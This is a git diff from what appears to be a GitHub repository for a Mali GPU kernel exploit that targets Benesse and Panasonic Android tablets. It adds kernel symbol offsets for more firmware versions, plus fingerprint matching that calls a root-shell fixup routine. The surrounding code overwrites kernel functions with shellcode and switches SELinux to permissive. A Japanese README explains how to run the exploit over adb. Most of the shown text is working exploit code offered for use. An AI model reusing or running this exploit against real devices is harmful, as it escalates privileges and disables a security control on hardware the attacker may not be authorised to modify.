SmileTabLabo · s1204IT · Jun 28, 2024 · Jun 20, 2024 · Jun 20, 2024 · Jun 28, 2024
diff --git a/README.md b/README.md
@@ -24,11 +24,7 @@ adb shell /data/local/tmp/shrinker
 > 途中でクラッシュしたり、無効な引数があると返される場合があります。  
 > 残念ながら**仕様**なので、根気強く何度も挑戦して下さい。
 
-一番最後に **`result 49`** と返ってきたら、
-```
-adb shell getenforce
-```
-結果が **`Permissive`** と返って来る事を確認して下さい。  
+一番最後に **`Permissive`** と返ってきたら、
 エクスプロイトの実行は成功です。
 
 <details><summary>TAB-A05-BD 01.11.000 での実行コード</summary>
@@ -65,7 +61,6 @@ run_enforce_un: open
 run_enforce_un: after read
 run_enforce_un: after close
 result 49
-TAB-A05-BD:/ $ getenforce
 Permissive
 ```
 </details>
@@ -82,6 +77,9 @@ Permissive
 > [!IMPORTANT]
 > SELinux が **`Permissive`** の状態の端末を使用してください。
 
+> [!TIP]
+> [**EasyBLU**](https://github.com/Kobold831/EasyBLU) を用いると簡単です。
+
 始めに、[**DchaServiceTester**](https://github.com/s1204IT/DchaServiceTester/releases/latest) をインストールしてください。  
 インストールが終わり次第、アプリを起動し、**`copyUpdateImage`** を選択して下さい。
 

diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -76,18 +76,57 @@ Search: sel_read_enforce ->
 SELINUX_ENFORCING = ldr - KERNEL_BASE
 
 Need: ARM to HEX
-ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
 ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
+ADD_COMMIT = add x8, x8, #0x(Last 3 digits of COMMIT_CRED)
 */
 
 /*
  * Maintained by Syuugo
  */
 
+// TAB-A05-BD 00.04.000
+#define COMMIT_CREDS_CTX_00_04_000 0x5a120
+#define AVC_DENY_CTX_00_04_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000 0x365d80
+#define INIT_CRED_CTX_00_04_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_04_000 0x129d9bc
+#define ADD_INIT_CTX_00_04_000 0x910fc000
+#define ADD_COMMIT_CTX_00_04_000 0x91048108
+
+// TAB-A05-BD 00.05.000
+#define COMMIT_CREDS_CTX_00_05_000 0x5a120
+#define AVC_DENY_CTX_00_05_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000 0x365d80
+#define INIT_CRED_CTX_00_05_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_05_000 0x129d9bc
+#define ADD_INIT_CTX_00_05_000 0x910fc000
+#define ADD_COMMIT_CTX_00_05_000 0x91048108
+
+// TAB-A05-BD 00.08.000
+#define COMMIT_CREDS_CTX_00_08_000 0x5a120
+#define AVC_DENY_CTX_00_08_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000 0x365d80
+#define INIT_CRED_CTX_00_08_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_08_000 0x129d9bc
+#define ADD_INIT_CTX_00_08_000 0x910fc000
+#define ADD_COMMIT_CTX_00_08_000 0x91048108
+
+// TAB-A05-BD 00.09.000
+#define COMMIT_CREDS_CTX_00_09_000 0x5a120
+#define AVC_DENY_CTX_00_09_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8
+#define SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000 0x365d80
+#define INIT_CRED_CTX_00_09_000 0x11553f0
+#define SELINUX_ENFORCING_CTX_00_09_000 0x129d9bc
+#define ADD_INIT_CTX_00_09_000 0x910fc000
+#define ADD_COMMIT_CTX_00_09_000 0x91048108
+
 // TAB-A05-BD 01.00.000
 #define COMMIT_CREDS_CTX_01_00_000 0x5a120
 #define AVC_DENY_CTX_01_00_000 0x35acc8
-#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
 #define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
 #define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
 #define INIT_CRED_CTX_01_00_000 0x11553f0
@@ -125,6 +164,16 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
 #define ADD_INIT_CTX_01_11_000 0x910fc000
 #define ADD_COMMIT_CTX_01_11_000 0x91048108
 
+// TAB-A05-BA1 00.03.000
+#define COMMIT_CREDS_CTZ_00_03_000 0x5a120
+#define AVC_DENY_CTZ_00_03_000 0x359c20
+#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370
+#define SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000 0x364d48
+#define INIT_CRED_CTZ_00_03_000 0x11753f0
+#define SELINUX_ENFORCING_CTZ_00_03_000 0x12e49bc
+#define ADD_INIT_CTZ_00_03_000 0x910fc000
+#define ADD_COMMIT_CTZ_00_03_000 0x91048108
+
 // TAB-A05-BA1 01.00.000
 #define COMMIT_CREDS_CTZ_01_00_000 0x5a120
 #define AVC_DENY_CTZ_01_00_000 0x359c20
@@ -181,8 +230,8 @@ static uint64_t selinux_enforcing;
 
 //static uint64_t avc_deny = 0x2CCC28;
 static uint64_t avc_deny;
-static uint64_t selinux_enforcing_READ = 0X0;
-static uint64_t selinux_enforcing_WRITE = 0X0;
+static uint64_t selinux_enforcing_READ = 0x0;
+static uint64_t selinux_enforcing_WRITE = 0x0;
 /*
   Overwriting SELinux to permissive
   strb wzr, [x0]
@@ -634,7 +683,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
   if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     err(1, "submit job failed\n");
   }
-  usleep(300000);
+  usleep(100000);
 }
 
 void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
@@ -651,15 +700,15 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
         LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset);
         curr_overwrite_addr = overwrite_addr;
         write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type);
-        usleep(300000);
+        usleep(100000);
       }
     }
   }
 }
 
 void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
   printf("write_func called with code_size = %llu\n", code_size);
-  usleep(300000);
+  usleep(100000);
   uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
   uint64_t curr_overwrite_addr = 0;
   for (int i = 0; i < size; i++) {
@@ -675,7 +724,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
         for (int code = code_size - 1; code >= 0; code--) {
           write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
         }
-        usleep(300000);
+        usleep(100000);
       }
     }
   }
@@ -684,7 +733,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u
 int run_enforce() {
   char result = '2';
   printf("run_enforce: before sleep\n");
-  sleep(3);
+  sleep(2);
   printf("run_enforce: after sleep\n");
   int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
   printf("run_enforce: open\n");
@@ -712,7 +761,7 @@ int run_enforce_write() {
 int run_enforce_un() {
   char result = '2';
   printf("run_enforce_un: before sleep\n");
-  sleep(3);
+  sleep(2);
   printf("run_enforce_un: after sleep\n");
   int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY);
   printf("run_enforce_un: open\n");
@@ -729,6 +778,34 @@ void select_offset() {
   int len = __system_property_get("ro.build.fingerprint", fingerprint);
   LOG("fingerprint: %s\n", fingerprint);
 
+  if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys")) {
+    selinux_enforcing = SELINUX_ENFORCING_CTX_00_04_000;
+    sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000;
+    fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000);
+    return;
+  }
+
+  if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys")) {
+    selinux_enforcing = SELINUX_ENFORCING_CTX_00_05_000;
+    sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000;
+    fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000);
+    return;
+  }
+
+  if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys")) {
+    selinux_enforcing = SELINUX_ENFORCING_CTX_00_08_000;
+    sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000;
+    fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000);
+    return;
+  }
+
+  if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys")) {
+    selinux_enforcing = SELINUX_ENFORCING_CTX_00_09_000;
+    sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000;
+    fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000);
+    return;
+  }
+
   if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_CTX_01_00_000;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000;
@@ -757,6 +834,13 @@ void select_offset() {
     return;
   }
 
+  if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys")) {
+    selinux_enforcing = SELINUX_ENFORCING_CTZ_00_03_000;
+    sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000;
+    fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000);
+    return;
+  }
+
   if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_CTZ_01_00_000;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000;
@@ -803,7 +887,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
   uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
-  usleep(300000);
+  usleep(100000);
   // Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
@@ -947,7 +1031,7 @@ int main() {
   int flush_idx = 0;
   for (int i = 0; i < 10; i++) {
     if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
-      system("sh");
+      system("getenforce");
       break;
     }
   }